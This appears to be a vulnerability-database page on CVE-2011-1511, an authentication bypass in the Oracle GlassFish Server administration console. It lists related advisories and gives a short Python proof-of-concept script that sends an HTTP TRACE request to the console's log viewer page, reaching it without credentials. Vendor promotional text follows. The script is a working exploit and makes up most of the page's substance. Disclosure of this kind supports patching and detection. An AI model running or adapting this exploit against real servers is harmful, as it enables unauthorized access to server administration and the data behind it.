| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
| Oracle GlassFish Server Administration Console Authentication Bypass | 12 May 201100:00 | – | zdt | |
| CVE-2011-1511 | 12 May 201100:00 | – | circl | |
| Oracle GlassFish Server Administration Console Authentication Bypass | 11 May 201100:00 | – | coresecurity | |
| Oracle GlassFish Server Administration Console Authentication Bypass (CVE-2011-1511) | 14 Oct 201200:00 | – | checkpoint_advisories | |
| Oracle GlassFish Server Administration Console Authentication Bypass - Ver2 (CVE-2011-1511) | 26 Mar 201500:00 | – | checkpoint_advisories | |
| CVE-2011-1511 | 20 Jul 201122:36 | – | cve | |
| CVE-2011-1511 | 20 Jul 201122:36 | – | cvelist | |
| Oracle GlassFish Server - Administration Console Authentication Bypass | 12 May 201100:00 | – | exploitdb | |
| Oracle GlassFish Server - Administration Console Authentication Bypass | 12 May 201100:00 | – | exploitpack | |
| Oracle GlassFish Server Administrative Console Authentication Bypass | 12 May 201100:00 | – | nessus |
#!/usr/bin/env python
import sys
import httplib
def make_trace_request(host, port, selector):
print '[*] TRACE request: %s' % selector
headers = { 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0;
Windows NT 5.1; Trident/4.0)',
'Host': '%s:%s' % (host, port),
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-us,en;q=0.5',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Accept-Encoding': 'gzip,deflate',
'Connection': 'close',
'Referer': 'http://%s:%s%s' % (host, port, selector)}
conn = httplib.HTTPConnection(host, port)
conn.request('TRACE', selector, headers=headers)
response = conn.getresponse()
conn.close()
print response.status, response.reason
print response.getheaders()
print response.read()
if len(sys.argv) != 3:
print "Usage: $ python poc.py <GlassFish_IP>
<GlassFish_Administration_Port>\nE.g: $ python poc.py 192.168.0.1 4848"
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
make_trace_request(host, port, '/common/logViewer/logViewer.jsf')
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation